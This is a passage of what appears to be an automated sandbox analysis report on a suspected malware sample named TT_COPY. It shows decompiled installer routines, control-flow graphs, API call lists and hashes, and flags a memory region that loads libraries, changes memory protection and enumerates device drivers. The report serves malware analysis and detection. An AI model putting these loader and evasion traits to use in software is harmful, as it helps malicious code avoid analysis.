                                                                                                                            0x00405c93
                                                                                                                            0x00405db3
                                                                                                                            0x00405db5
                                                                                                                            0x00405db8
                                                                                                                            0x00405e09
                                                                                                                            0x00405e09
                                                                                                                            0x00405e09
                                                                                                                            0x00405dba
                                                                                                                            0x00405dbd
                                                                                                                            0x00405dc8
                                                                                                                            0x00405dcd
                                                                                                                            0x00405dcf
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00405dd2
                                                                                                                            0x00405dde
                                                                                                                            0x00405de3
                                                                                                                            0x00405de5
                                                                                                                            0x00000000
                                                                                                                            0x00405e00
                                                                                                                            0x00405de7
                                                                                                                            0x00405dea
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00405def
                                                                                                                            0x00000000
                                                                                                                            0x00405df6
                                                                                                                            0x00405dbf
                                                                                                                            0x00405dbf
                                                                                                                            0x00000000
                                                                                                                            0x00405dbf
                                                                                                                            0x00405c99
                                                                                                                            0x00405c9c
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00405c9c

                                                                                                                            APIs
                                                                                                                            • DeleteFileW.KERNELBASE(?,?,75DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C72
                                                                                                                            • lstrcatW.KERNEL32(0042F270,\*.*), ref: 00405CBA
                                                                                                                            • lstrcatW.KERNEL32(?,0040A014), ref: 00405CDD
                                                                                                                            • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,75DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CE3
                                                                                                                            • FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,75DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CF3
                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D93
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00405DA2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                            • String ID: .$.$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                            • API String ID: 2035342205-1953461807
                                                                                                                            • Opcode ID: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
                                                                                                                            • Instruction ID: 8b2ee76931e9ba666d6dc67a471f1b560bbb00ea1adf29c264b32972d7114dcf
                                                                                                                            • Opcode Fuzzy Hash: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
                                                                                                                            • Instruction Fuzzy Hash: 3D41A130900A14BADB216B65CC8DABF7678DF81714F14817FF841B21D1D77C4A819EAE
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 983 2b62647-2b62697 985 2b6bb14-2b6bb26 983->985 986 2b6269d-2b6283d call 2b6ebee 983->986 985->985 987 2b6bb28-2b6bbcb 985->987 1041 2b62843-2b628e1 986->1041 1042 2b62c21-2b62c3a 986->1042 991 2b6bbf6-2b6bc0d LoadLibraryA call 2b6bc13 987->991 992 2b6bbcd-2b6bbd4 987->992 994 2b6f513-2b6f517 992->994 995 2b6bbda-2b6bbf4 call 2b6c27d call 2b6bc13 992->995 999 2b6f518-2b6f51e 994->999 995->991 1003 2b6f524-2b6f574 999->1003 1004 2b66043-2b6ed0a 999->1004 1003->994 1011 2b6f576-2b6f59a 1003->1011 1024 2b6ed10-2b6ed4e 1004->1024 1011->999 1014 2b6f5a0-2b6f5a4 1011->1014 1028 2b6ed51-2b6ed58 1024->1028 1028->1028 1030 2b6ed5a-2b6ee17 call 2b6eda8 call 2b6ef1d K32EnumDeviceDrivers 1028->1030 1047 2b6ee1c-2b6ee23 1030->1047 1054 2b628e7-2b6299b 1041->1054 1055 2b5e358-2b5e373 call 2b6f915 1041->1055 1042->985 1047->1047 1049 2b6ee25-2b6ee8e 1047->1049 1054->1042 1064 2b629a1-2b629ba 1054->1064 1060 2b5e375-2b5e37c 1055->1060 1061 2b5e3e1-2b5e3f2 1055->1061 1062 2b5e37e-2b5e387 1060->1062 1063 2b5e309-2b5e343 1060->1063 1061->1004 1065 2b5e3dc-2b5e3dd 1062->1065 1066 2b5e389-2b5e392 call 2b6bb14 1062->1066 1063->985 1067 2b62a1e-2b62a45 1064->1067 1068 2b629bc-2b62a19 call 2b6ebee 1064->1068 1066->983 1072 2b62bc3-2b62c1e 1067->1072 1073 2b62a4b-2b62bbe call 2b6ebee 1067->1073 1068->1067 1073->1072
                                                                                                                            APIs
                                                                                                                            • LoadLibraryA.KERNELBASE(2D32AE79), ref: 02B6BBF6
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1071156042.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2b20000_TT_COPY.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad
                                                                                                                            • String ID: "0$|@v
                                                                                                                            • API String ID: 1029625771-1170111338
                                                                                                                            • Opcode ID: b0f1042311650dd8b53c707623c3b8dcdc3e53e6d5082c93c997f7258108e0ef
                                                                                                                            • Instruction ID: 0ddc72782edb4487cd1f7cbd95dba29eb4ee66d42dbfc79f74757b09d98b35aa
                                                                                                                            • Opcode Fuzzy Hash: b0f1042311650dd8b53c707623c3b8dcdc3e53e6d5082c93c997f7258108e0ef
                                                                                                                            • Instruction Fuzzy Hash: ADC1137160434A9FDF349E298D987EB77F2EF95350F98816EDC899B254D3308A41CB42
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00406873(WCHAR* _a4) {
                                                                                                                            				void* _t2;
                                                                                                                            
                                                                                                                            				_t2 = FindFirstFileW(_a4, 0x4302b8); // executed
                                                                                                                            				if(_t2 == 0xffffffff) {
                                                                                                                            					return 0;
                                                                                                                            				}
                                                                                                                            				FindClose(_t2);
                                                                                                                            				return 0x4302b8;
                                                                                                                            			}




                                                                                                                            0x0040687e
                                                                                                                            0x00406887
                                                                                                                            0x00000000
                                                                                                                            0x00406894
                                                                                                                            0x0040688a
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • FindFirstFileW.KERNELBASE(75DF3420,004302B8,0042FA70,00405F5D,0042FA70,0042FA70,00000000,0042FA70,0042FA70,75DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75DF3420,C:\Users\user\AppData\Local\Temp\), ref: 0040687E
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0040688A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2295610775-0
                                                                                                                            • Opcode ID: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                                                                                            • Instruction ID: 67599a3b69382adcf67454a25bfea179debcebd0a6e2e92eb77ede12202c023a
                                                                                                                            • Opcode Fuzzy Hash: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                                                                                            • Instruction Fuzzy Hash: C3D012325192205FC3402B386E0C84B7A989F16331726CB76B4AAF51E0D7388C7387BD
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1071156042.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2b20000_TT_COPY.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoadMemoryProtectVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3389902171-0
                                                                                                                            • Opcode ID: b3024760bd8f0db058d1c4b1f4cbb2832f028af4b5528cba3010e9869c37ea33
                                                                                                                            • Instruction ID: 5b68ca7a65d8106e8e599a04d26e52c7249f3796831db34a2158a75040b265de
                                                                                                                            • Opcode Fuzzy Hash: b3024760bd8f0db058d1c4b1f4cbb2832f028af4b5528cba3010e9869c37ea33
                                                                                                                            • Instruction Fuzzy Hash: 77420B355083858FDF31DF38C89C7EA7BA2AF52360F59829ACC998F196D3358546CB12
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • CreateFileA.KERNELBASE(?,A4572450,42DDFE32,354F6D12,-4EEA534B,4956C027,-6266285B,02B6AB3D,-23363FD2,02B6B487,02B5DC85), ref: 02B6B414
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1071156042.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2b20000_TT_COPY.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 823142352-0
                                                                                                                            • Opcode ID: 5bc3268fc8888510d6e5e3254061e8a0e4e7907dd56f2d44453ffd5b629333f8
                                                                                                                            • Instruction ID: a0bd56b0ac1ebeee89681dfda549569cbd164e88c30c307ae7fed37ff519ca40
                                                                                                                            • Opcode Fuzzy Hash: 5bc3268fc8888510d6e5e3254061e8a0e4e7907dd56f2d44453ffd5b629333f8
                                                                                                                            • Instruction Fuzzy Hash: 78418B72718309DFDB34CD398E987FB66E3AF85354F55822ACC0AE7545E3744A42C602
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • K32EnumDeviceDrivers.KERNEL32(02B6F37F), ref: 02B6EDC0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1071156042.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2b20000_TT_COPY.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: DeviceDriversEnum
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 22031212-0
                                                                                                                            • Opcode ID: 2bb97599097ac7755103f7fcfb61c69ae0fdd1591872189e8f332a633d899cb8
                                                                                                                            • Instruction ID: f6a3742bc0658bb4375a55767c6c785b8cf24ef137a44c79b2b2695560c4a7ea
                                                                                                                            • Opcode Fuzzy Hash: 2bb97599097ac7755103f7fcfb61c69ae0fdd1591872189e8f332a633d899cb8
                                                                                                                            • Instruction Fuzzy Hash: F011CE3A508306CFCB39AEA4898CAF93662AB98310F6085A5DC06DF244D738D546CB01
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • NtProtectVirtualMemory.NTDLL ref: 02B6E6D0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1071156042.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2b20000_TT_COPY.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: MemoryProtectVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2706961497-0
                                                                                                                            • Opcode ID: b56fe1c30e761ef7c02a80fe310b7f0f48d5671780f3440c493f257d89d7ae6b
                                                                                                                            • Instruction ID: 0e6924b4f486e9abc1732f5b487f0faa8249b7f21fa60b5371e98e4077de6d6c
                                                                                                                            • Opcode Fuzzy Hash: b56fe1c30e761ef7c02a80fe310b7f0f48d5671780f3440c493f257d89d7ae6b
                                                                                                                            • Instruction Fuzzy Hash: 4C013171A043459FDB34DE59C9C45EEB7AAEFD8300F45842EDD599B205C3706E45CB11
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 41%
                                                                                                                            			E0040290B(short __ebx, short* __edi) {
                                                                                                                            				void* _t8;
                                                                                                                            				void* _t21;
                                                                                                                            
                                                                                                                            				_t8 = FindFirstFileW(E00402DA6(2), _t21 - 0x2dc); // executed
                                                                                                                            				if(_t8 != 0xffffffff) {
                                                                                                                            					E00406484( *((intOrPtr*)(_t21 - 0xc)), _t8);
                                                                                                                            					_push(_t21 - 0x2b0);
                                                                                                                            					_push(__edi);
                                                                                                                            					E0040653D();
                                                                                                                            				} else {
                                                                                                                            					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
                                                                                                                            					 *__edi = __ebx;
                                                                                                                            					 *((intOrPtr*)(_t21 - 4)) = 1;
                                                                                                                            				}
                                                                                                                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t21 - 4));
                                                                                                                            				return 0;
                                                                                                                            			}





                                                                                                                            0x0040291a
                                                                                                                            0x00402923
                                                                                                                            0x0040293e
                                                                                                                            0x00402949
                                                                                                                            0x0040294a
                                                                                                                            0x00402a94
                                                                                                                            0x00402925
                                                                                                                            0x00402928
                                                                                                                            0x0040292b
                                                                                                                            0x0040292e
                                                                                                                            0x0040292e
                                                                                                                            0x00402c2d
                                                                                                                            0x00402c39

                                                                                                                            APIs
                                                                                                                            • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040291A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileFindFirst
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1974802433-0
                                                                                                                            • Opcode ID: 2616af6840be9ad065c7271e10669628003eadbae38ac98b1b8d582da80c65e5
                                                                                                                            • Instruction ID: 3f6fbcf0fd4d311cdd608d5f72697756ed96b8559223cd5d9f1c4d92bc61f1b3
                                                                                                                            • Opcode Fuzzy Hash: 2616af6840be9ad065c7271e10669628003eadbae38ac98b1b8d582da80c65e5
                                                                                                                            • Instruction Fuzzy Hash: 3CF08271A04105EFD701DBA4ED49AAEB378FF14314F60417BE116F21D0E7B88E159B29
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 143 403f9a-403fac 144 403fb2-403fb8 143->144 145 404113-404122 143->145 144->145 148 403fbe-403fc7 144->148 146 404171-404186 145->146 147 404124-40416c GetDlgItem * 2 call 404499 SetClassLongW call 40140b 145->147 150 4041c6-4041cb call 4044e5 146->150 151 404188-40418b 146->151 147->146 152 403fc9-403fd6 SetWindowPos 148->152 153 403fdc-403fe3 148->153 167 4041d0-4041eb 150->167 157 40418d-404198 call 401389 151->157 158 4041be-4041c0 151->158 152->153 154 403fe5-403fff ShowWindow 153->154 155 404027-40402d 153->155 160 404100-40410e call 404500 154->160 161 404005-404018 GetWindowLongW 154->161 162 404046-404049 155->162 163 40402f-404041 DestroyWindow 155->163 157->158 183 40419a-4041b9 SendMessageW 157->183 158->150 166 404466 158->166 173 404468-40446f 160->173 161->160 170 40401e-404021 ShowWindow 161->170 174 40404b-404057 SetWindowLongW 162->174 175 40405c-404062 162->175 171 404443-404449 163->171 166->173 168 4041f4-4041fa 167->168 169 4041ed-4041ef call 40140b 167->169 180 404200-40420b 168->180 181 404424-40443d DestroyWindow EndDialog 168->181 169->168 170->155 171->166 179 40444b-404451 171->179 174->173 175->160 182 404068-404077 GetDlgItem 175->182 179->166 185 404453-40445c ShowWindow 179->185 180->181 186 404211-40425e call 40657a call 404499 * 3 GetDlgItem 180->186 181->171 187 404096-404099 182->187 188 404079-404090 SendMessageW IsWindowEnabled 182->188 183->173 185->166 215 404260-404265 186->215 216 404268-4042a4 ShowWindow KiUserCallbackDispatcher call 4044bb EnableWindow 186->216 190 40409b-40409c 187->190 191 40409e-4040a1 187->191 188->166 188->187 193 4040cc-4040d1 call 404472 190->193 194 4040a3-4040a9 191->194 195 4040af-4040b4 191->195 193->160 197 4040ea-4040fa SendMessageW 194->197 200 4040ab-4040ad 194->200 196 4040b6-4040bc 195->196 195->197 201 4040d3-4040dc call 40140b 196->201 202 4040be-4040c4 call 40140b 196->202 197->160 200->193 201->160 212 4040de-4040e8 201->212 211 4040ca 202->211 211->193 212->211 215->216 219 4042a6-4042a7 216->219 220 4042a9 216->220 221 4042ab-4042d9 GetSystemMenu EnableMenuItem SendMessageW 219->221 220->221 222 4042db-4042ec SendMessageW 221->222 223 4042ee 221->223 224 4042f4-40432c call 4044ce call 403f7b call 40653d lstrlenW call 40657a SetWindowTextW call 401389 222->224 223->224 234 404331-404333 224->234 234->167 235 404339-40433b 234->235 235->167 236 404341-404345 235->236 237 404364-404378 DestroyWindow 236->237 238 404347-40434d 236->238 237->171 240 40437e-4043ab CreateDialogParamW 237->240 238->166 239 404353-404359 238->239 239->167 241 40435f 239->241 240->171 242 4043b1-404408 call 404499 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 240->242 241->166 242->166 247 40440a-404422 ShowWindow call 4044e5 242->247 247->171
                                                                                                                            C-Code - Quality: 84%
                                                                                                                            			E00403F9A(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
                                                                                                                            				struct HWND__* _v28;
                                                                                                                            				void* _v84;
                                                                                                                            				void* _v88;
                                                                                                                            				void* __ebx;
                                                                                                                            				void* __edi;
                                                                                                                            				void* __esi;
                                                                                                                            				signed int _t34;
                                                                                                                            				signed int _t36;
                                                                                                                            				signed int _t38;
                                                                                                                            				struct HWND__* _t48;
                                                                                                                            				signed int _t67;
                                                                                                                            				struct HWND__* _t73;
                                                                                                                            				signed int _t86;
                                                                                                                            				struct HWND__* _t91;
                                                                                                                            				signed int _t99;
                                                                                                                            				int _t103;
                                                                                                                            				signed int _t117;
                                                                                                                            				int _t118;
                                                                                                                            				int _t122;
                                                                                                                            				signed int _t124;
                                                                                                                            				struct HWND__* _t127;
                                                                                                                            				struct HWND__* _t128;
                                                                                                                            				int _t129;
                                                                                                                            				intOrPtr _t130;
                                                                                                                            				long _t133;
                                                                                                                            				int _t135;
                                                                                                                            				int _t136;
                                                                                                                            				void* _t137;
                                                                                                                            
                                                                                                                            				_t130 = _a8;
                                                                                                                            				if(_t130 == 0x110 || _t130 == 0x408) {
                                                                                                                            					_t34 = _a12;
                                                                                                                            					_t127 = _a4;
                                                                                                                            					__eflags = _t130 - 0x110;
                                                                                                                            					 *0x42d250 = _t34;
                                                                                                                            					if(_t130 == 0x110) {
                                                                                                                            						 *0x434f08 = _t127;
                                                                                                                            						 *0x42d264 = GetDlgItem(_t127, 1);
                                                                                                                            						_t91 = GetDlgItem(_t127, 2);
                                                                                                                            						_push(0xffffffff);
                                                                                                                            						_push(0x1c);
                                                                                                                            						 *0x42b230 = _t91;
                                                                                                                            						E00404499(_t127);
                                                                                                                            						SetClassLongW(_t127, 0xfffffff2,  *0x433ee8);
                                                                                                                            						 *0x433ecc = E0040140B(4);
                                                                                                                            						_t34 = 1;
                                                                                                                            						__eflags = 1;
                                                                                                                            						 *0x42d250 = 1;
                                                                                                                            					}
                                                                                                                            					_t124 =  *0x40a368; // 0x0
                                                                                                                            					_t136 = 0;
                                                                                                                            					_t133 = (_t124 << 6) +  *0x434f20;
                                                                                                                            					__eflags = _t124;
                                                                                                                            					if(_t124 < 0) {
                                                                                                                            						L36:
                                                                                                                            						E004044E5(0x40b);
                                                                                                                            						while(1) {
                                                                                                                            							_t36 =  *0x42d250;
                                                                                                                            							 *0x40a368 =  *0x40a368 + _t36;
                                                                                                                            							_t133 = _t133 + (_t36 << 6);
                                                                                                                            							_t38 =  *0x40a368; // 0x0
                                                                                                                            							__eflags = _t38 -  *0x434f24;
                                                                                                                            							if(_t38 ==  *0x434f24) {
                                                                                                                            								E0040140B(1);
                                                                                                                            							}
                                                                                                                            							__eflags =  *0x433ecc - _t136;
                                                                                                                            							if( *0x433ecc != _t136) {
                                                                                                                            								break;
                                                                                                                            							}
                                                                                                                            							__eflags =  *0x40a368 -  *0x434f24; // 0x0
                                                                                                                            							if(__eflags >= 0) {
                                                                                                                            								break;
                                                                                                                            							}
                                                                                                                            							_t117 =  *(_t133 + 0x14);
                                                                                                                            							E0040657A(_t117, _t127, _t133, 0x445000,  *((intOrPtr*)(_t133 + 0x24)));
                                                                                                                            							_push( *((intOrPtr*)(_t133 + 0x20)));
                                                                                                                            							_push(0xfffffc19);
                                                                                                                            							E00404499(_t127);
                                                                                                                            							_push( *((intOrPtr*)(_t133 + 0x1c)));
                                                                                                                            							_push(0xfffffc1b);
                                                                                                                            							E00404499(_t127);
                                                                                                                            							_push( *((intOrPtr*)(_t133 + 0x28)));
                                                                                                                            							_push(0xfffffc1a);
                                                                                                                            							E00404499(_t127);
                                                                                                                            							_t48 = GetDlgItem(_t127, 3);
                                                                                                                            							__eflags =  *0x434f8c - _t136;
                                                                                                                            							_v28 = _t48;
                                                                                                                            							if( *0x434f8c != _t136) {
                                                                                                                            								_t117 = _t117 & 0x0000fefd | 0x00000004;
                                                                                                                            								__eflags = _t117;
                                                                                                                            							}
                                                                                                                            							ShowWindow(_t48, _t117 & 0x00000008); // executed
                                                                                                                            							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100); // executed
                                                                                                                            							E004044BB(_t117 & 0x00000002);
                                                                                                                            							_t118 = _t117 & 0x00000004;
                                                                                                                            							EnableWindow( *0x42b230, _t118);
                                                                                                                            							__eflags = _t118 - _t136;
                                                                                                                            							if(_t118 == _t136) {
                                                                                                                            								_push(1);
                                                                                                                            							} else {
                                                                                                                            								_push(_t136);
                                                                                                                            							}
                                                                                                                            							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
                                                                                                                            							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
                                                                                                                            							__eflags =  *0x434f8c - _t136;
                                                                                                                            							if( *0x434f8c == _t136) {
                                                                                                                            								_push( *0x42d264);
                                                                                                                            							} else {
                                                                                                                            								SendMessageW(_t127, 0x401, 2, _t136);
                                                                                                                            								_push( *0x42b230);
                                                                                                                            							}
                                                                                                                            							E004044CE();
                                                                                                                            							E0040653D(0x42d268, E00403F7B());
                                                                                                                            							E0040657A(0x42d268, _t127, _t133,  &(0x42d268[lstrlenW(0x42d268)]),  *((intOrPtr*)(_t133 + 0x18)));
                                                                                                                            							SetWindowTextW(_t127, 0x42d268); // executed
                                                                                                                            							_push(_t136);
                                                                                                                            							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
                                                                                                                            							__eflags = _t67;
                                                                                                                            							if(_t67 != 0) {
                                                                                                                            								continue;
                                                                                                                            							} else {
                                                                                                                            								__eflags =  *_t133 - _t136;
                                                                                                                            								if( *_t133 == _t136) {
                                                                                                                            									continue;
                                                                                                                            								}
                                                                                                                            								__eflags =  *(_t133 + 4) - 5;
                                                                                                                            								if( *(_t133 + 4) != 5) {
                                                                                                                            									DestroyWindow( *0x433ed8);
                                                                                                                            									 *0x42c240 = _t133;
                                                                                                                            									__eflags =  *_t133 - _t136;
                                                                                                                            									if( *_t133 <= _t136) {
                                                                                                                            										goto L60;
                                                                                                                            									}
                                                                                                                            									_t73 = CreateDialogParamW( *0x434f00,  *_t133 +  *0x433ee0 & 0x0000ffff, _t127,  *( *(_t133 + 4) * 4 + "XF@"), _t133);
                                                                                                                            									__eflags = _t73 - _t136;
                                                                                                                            									 *0x433ed8 = _t73;
                                                                                                                            									if(_t73 == _t136) {
                                                                                                                            										goto L60;
                                                                                                                            									}
                                                                                                                            									_push( *((intOrPtr*)(_t133 + 0x2c)));
                                                                                                                            									_push(6);
                                                                                                                            									E00404499(_t73);
                                                                                                                            									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
                                                                                                                            									ScreenToClient(_t127, _t137 + 0x10);
                                                                                                                            									SetWindowPos( *0x433ed8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
                                                                                                                            									_push(_t136);
                                                                                                                            									E00401389( *((intOrPtr*)(_t133 + 0xc)));
                                                                                                                            									__eflags =  *0x433ecc - _t136;
                                                                                                                            									if( *0x433ecc != _t136) {
                                                                                                                            										goto L63;
                                                                                                                            									}
                                                                                                                            									ShowWindow( *0x433ed8, 8);
                                                                                                                            									E004044E5(0x405);
                                                                                                                            									goto L60;
                                                                                                                            								}
                                                                                                                            								__eflags =  *0x434f8c - _t136;
                                                                                                                            								if( *0x434f8c != _t136) {
                                                                                                                            									goto L63;
                                                                                                                            								}
                                                                                                                            								__eflags =  *0x434f80 - _t136;
                                                                                                                            								if( *0x434f80 != _t136) {
                                                                                                                            									continue;
                                                                                                                            								}
                                                                                                                            								goto L63;
                                                                                                                            							}
                                                                                                                            						}
                                                                                                                            						DestroyWindow( *0x433ed8);
                                                                                                                            						 *0x434f08 = _t136;
                                                                                                                            						EndDialog(_t127,  *0x42ba38);
                                                                                                                            						goto L60;
                                                                                                                            					} else {
                                                                                                                            						__eflags = _t34 - 1;
